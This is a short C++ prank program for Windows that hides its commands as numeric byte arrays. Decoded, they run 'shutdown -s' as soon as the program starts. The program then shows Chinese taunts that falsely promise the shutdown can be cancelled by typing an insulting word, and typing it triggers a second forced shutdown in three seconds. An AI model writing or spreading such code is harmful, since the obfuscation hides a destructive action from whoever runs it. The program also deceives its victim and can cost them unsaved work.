#include <bits/stdc++.h>
using namespace std;
string s1 = {-68, -76, -67, -85, -71, -40, -69, -6, -93, -84, -67, -48, -80, -42, -80, -42, -67, -30, -77, -3, 10};
string s2 = {-58, -83, -60, -29, -75, -60, -93, -84, -67, -48, -80, -42, -80, -42, -63, -94, -65, -52, -71, -40, -69, -6};
string s3 = {115, 104, 117, 116, 100, 111, 119, 110, 32, 45, 115};
string s4 = {115, 104, 117, 116, 100, 111, 119, 110, 32, 45, 115, 32, 45, 116, 32, 51};
string s5 = {-80, -42, -80, -42};
int main() {
system(s3.c_str());
cout << s1;
while(true) {
string x;
cin >> x;
if(x == s5) {
cout << s2;
system(s4.c_str());
}
}
return 0;
}
仅限Windows环境